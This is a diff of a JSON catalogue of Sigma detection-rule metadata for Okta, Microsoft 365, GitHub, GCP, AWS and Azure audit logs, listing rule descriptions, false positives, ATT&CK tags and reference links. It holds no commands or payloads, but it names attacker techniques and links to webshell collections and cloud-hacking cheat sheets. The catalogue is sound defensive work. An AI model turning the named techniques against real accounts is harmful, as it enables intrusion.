"https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ @@ -79149,11 +80500,11 @@ "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c", + "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7", + "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", + "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916", - "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d", - "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7", - "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml" ], "tags": [ @@ -79230,8 +80581,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://sec.okta.com/fastpassphishingdetection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml" ], @@ -79265,9 +80616,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": "No established tags" @@ -79275,6 +80626,74 @@ "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "value": "Okta Security Threat Detected" }, + { + "description": "Detects when Okta identifies new activity in the Admin Console.", + "meta": { + "author": "kelnage", + "creation_date": "2023/09/07", + "falsepositive": [ + "Whenever an admin starts using new features of the admin console." + ], + "filename": "okta_new_behaviours_admin_console.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_new_behaviours_admin_console.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", + "value": "Okta New Admin Console Behaviours" + }, + { + "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.", + "meta": { + "author": "kelnage", + "creation_date": "2023/09/07", + "falsepositive": [ + "If an end-user incorrectly identifies normal activity as suspicious." + ], + "filename": "okta_suspicious_activity_enduser_report.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_suspicious_activity_enduser_report.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1586.003" + ] + }, + "related": [ + { + "dest-uuid": "3d52e51e-f6db-4719-813c-48002a99f43a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "07e97cc6-aed1-43ae-9081-b3470d2367f1", + "value": "Okta Suspicious Activity Reported by End-user" + }, { "description": "Detects when an user account is locked out.", "meta": { @@ -79288,8 +80707,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ @@ -79309,6 +80728,40 @@ "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", "value": "Okta User Account Locked Out" }, + { + "description": "Detects when a new identity provider is created for Okta.", + "meta": { + "author": "kelnage", + "creation_date": "2023/09/07", + "falsepositive": [ + "When an admin creates a new, authorised identity provider." + ], + "filename": "okta_identity_provider_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.001" + ] + }, + "related": [ + { + "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "969c7590-8c19-4797-8c1b-23155de6e7ac", + "value": "Okta Identity Provider Created" + }, { "description": "Detects when a API Token is revoked.", "meta": { @@ -79322,8 +80775,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ @@ -79346,8 +80799,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ @@ -79370,8 +80823,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ @@ -79394,8 +80847,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ @@ -79418,8 +80871,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml" ], "tags": [ @@ -79442,8 +80895,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ @@ -79476,8 +80929,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ @@ -79500,9 +80953,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", "https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm", "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data", - "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml" ], "tags": [ @@ -79535,8 +80988,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ @@ -79559,8 +81012,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ @@ -79583,8 +81036,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ @@ -79621,8 +81074,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ @@ -79632,6 +81085,73 @@ "uuid": "1667a172-ed4c-463c-9969-efd92195319a", "value": "Okta Policy Modified or Deleted" }, + { + "description": "Detects when an Okta user session starts where the user is behind an anonymising proxy service.", + "meta": { + "author": "kelnage", + "creation_date": "2023/09/07", + "falsepositive": [ + "If a user requires an anonymising proxy due to valid justifications." + ], + "filename": "okta_user_session_start_via_anonymised_proxy.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_session_start_via_anonymised_proxy.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "related": [ + { + "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "bde30855-5c53-4c18-ae90-1ff79ebc9578", + "value": "Okta User Session Start Via An Anonymising Proxy Service" + }, + { + "description": "Detects disabling of Multi Factor Authentication.", + "meta": { + "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", + "creation_date": "2023/09/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "microsoft365_disabling_mfa.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_disabling_mfa.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ] + }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "60de9b57-dc4d-48b9-a6a0-b39e0469f876", + "value": "Disabling Multi Factor Authentication" + }, { "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", "meta": { @@ -79793,24 +81313,24 @@ "value": "Activity Performed by Terminated User" }, { - "description": "Alert for the addition of a new federated domain.", + "description": "Detects the addition of a new Federated Domain.", "meta": { - "author": "@ionsor", + "author": "Splunk Threat Research Team (original rule), '@ionsor (rule)'", "creation_date": "2022/02/08", "falsepositive": [ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." ], - "filename": "microsoft365_new_federated_domain_added.yml", + "filename": "microsoft365_new_federated_domain_added_exchange.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://o365blog.com/post/aadbackdoor/", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://o365blog.com/post/aadbackdoor/", "https://www.sygnia.co/golden-saml-advisory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added_exchange.yml" ], "tags": [ "attack.persistence", @@ -79827,7 +81347,7 @@ } ], "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", - "value": "New Federated Domain Added" + "value": "New Federated Domain Added - Exchange" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", @@ -80056,6 +81576,40 @@ "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", "value": "Microsoft 365 - Potential Ransomware Activity" }, + { + "description": "Detects the addition of a new Federated Domain.", + "meta": { + "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", + "creation_date": "2023/09/18", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "filename": "microsoft365_new_federated_domain_added_audit.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/", + "https://o365blog.com/post/aadbackdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added_audit.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ] + }, + "related": [ + { + "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "58f88172-a73d-442b-94c9-95eaed3cbb36", + "value": "New Federated Domain Added" + }, { "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", "meta": { @@ -80240,8 +81794,8 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml" ], "tags": [ @@ -80291,9 +81845,9 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository", - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", + "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml" ], "tags": [ @@ -80330,8 +81884,8 @@ "logsource.category": "No established category", "logsource.product": "github", "refs": [ - "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation", "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners", + "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml" ], "tags": [ @@ -80517,8 +82071,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://github.com/elastic/detection-rules/pull/1267", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/elastic/detection-rules/pull/1267", "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", @@ -80569,9 +82123,9 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://cloud.google.com/kubernetes-engine/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" ], "tags": [ @@ -80799,8 +82353,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ @@ -80833,9 +82387,9 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" ], "tags": [ @@ -80940,9 +82494,9 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], "tags": [ @@ -80965,8 +82519,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" ], "tags": [ @@ -81045,12 +82599,12 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], @@ -81329,8 +82883,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/elastic/detection-rules/pull/1214", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/elastic/detection-rules/pull/1214", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" ], "tags": [ @@ -81563,6 +83117,48 @@ "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", "value": "Restore Public AWS RDS Instance" }, + { + "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".", + "meta": { + "author": "daniel.bohannon@permiso.io (@danielhbohannon)", + "creation_date": "2023/05/17", + "falsepositive": [ + "Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value" + ], + "filename": "aws_iam_s3browser_templated_s3_bucket_policy_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.009", + "attack.persistence", + "attack.t1078.004" + ] + }, + "related": [ + { + "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "db014773-7375-4f4e-b83b-133337c0ffee", + "value": "AWS IAM S3Browser Templated S3 Bucket Policy Creation" + }, { "description": "Detects disabling, deleting and updating of a Trail", "meta": { @@ -81659,8 +83255,8 @@ "logsource.product": "aws", "refs": [ "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", - "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", + "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" ], "tags": [ @@ -81766,8 +83362,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ @@ -81817,9 +83413,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_cred_endpoint_query.yml" ], "tags": [ @@ -81951,8 +83547,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], @@ -83299,9 +84895,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], @@ -83583,8 +85179,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://blooteem.com/march-2022", "https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/", + "https://blooteem.com/march-2022", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_suspicious_signin_bypassing_mfa.yml" ], "tags": [ @@ -84422,9 +86018,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], @@ -84493,9 +86089,9 @@ "logsource.product": "azure", "refs": [ "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", 